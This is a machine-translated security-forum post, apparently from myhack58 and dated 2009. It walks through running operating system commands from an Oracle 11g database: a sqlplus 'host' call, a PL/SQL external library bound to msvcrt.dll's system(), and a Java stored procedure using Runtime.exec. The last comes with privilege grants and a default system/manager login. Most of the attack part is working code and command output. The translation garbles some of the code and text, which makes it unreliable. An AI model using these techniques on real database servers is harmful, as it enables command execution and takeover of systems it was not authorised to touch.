the oracle implementation of cmd-vulnerability warning-the black bar safety net

ID MYHACK58:62200922770
Type myhack58
Reporter 佚名
Modified 2009-04-03T00:00:00


Installed a oracle db11g, so wanted to try online streaming in sqlplus, execute the cmd commands, also don't know how, not a good, might be online around the wrong turn. However there is a simple implementation of the cmd method:

SQL> host net user

User accounts for \\PC-ATQHJ4UG1SDA

---------------------------------------------------------------------------- vmware_user admin Administrator ASPNET Guest IUSR_PC-ATQHJ4UG1SDA IWAM_PC-ATQHJ4UG1SDA SUPPORT_388945a0 The command completed successfully.

unix or linux with

! command


Online the other two methods:

1 是 利用 msvcrt.dll

Write A c:\orac. sql


Rem Rem oracmd. sql Rem Rem Run system commands via Oracle database servers Rem Rem Bugs to Rem CREATE OR REPLACE LIBRARY exec_shell AS 'C:\windows\system32\msvcrt.dll'; / show errors CREATE OR REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR); end oracmd; / show errors CREATE OR REPLACE PACKAGE BODY oracmd IS PROCEDURE exec(cmdstring IN CHAR) IS EXTERNAL NAME "system" LIBRARY exec_shell LANGUAGE C; end oracmd; / show errors

Then the C:\>sqlplus /nolog SQL*Plus: Release - Production on Thu Jun 7 1 4:2 5:3 8 2 0 0 1 (c) Copyright 2 0 0 0 Oracle Corporation. All rights reserved. SQL> connect system/manager@orcl (are the username and password and sid) Connected. SQL> @c:\orac.sql Library is created. No errors. Package created. No errors. Package body created. No errors. SQL> SQL> exec oracmd. exec ('dir > c:\oracle.txt');

The results in my present machine appears

Line 1 Error: ORA-2 8 5 9 5: that the extproc Agent: DLL path is invalid ORA-0 6 5 1 2: in "SYSTEM. ORACMD", line 2 ORA-0 6 5 1 2: In line 1

There is no success.

The second method


create or replace and compile java souRCe named "util" as import java. io.; import java. lang.; public class util extends Object { public static int RunThis(String args) { Runtime rt = Runtime. getRuntime(); int RC = -1; try { Process p = rt. exec(args); int bufSize = 4 0 9 6; BufferedInputStream bis =new BufferedInputStream(p. getInputStream(), bufSize); int len; byte buffer[] = new byte[bufSize]; // Echo back what the program spit out while ((len = bis. read(buffer, 0, bufSize)) != -1) System. out. write(buffer, 0, len); RC = p. the waitFor(); } catch (Exception e) { e. printStackTrace(); RC = -1; } finally { return RC; } } }


create or replace function RUN_CMz(p_cmd in varchar2) return number as language java name 'util. RunThis(java. lang. String) return integer';


create or replace procedure RC(p_cmd in varChar) as x number; begin x := RUN_CMz(p_cmd); end;

Landing up is still executed sequentially

SQL> @c:\1.sql /





variable x number;

set serveroutput on;

exec dbms_java. set_output(1 0 0 0 0 0);

grant javasyspriv to system;

grant javauserpriv to system; online method without this line, I can not be successful, plus the go can

exec :x:=run_cmz('ipconfig'); to successfully run the command

The test environment is win2003+oracle11g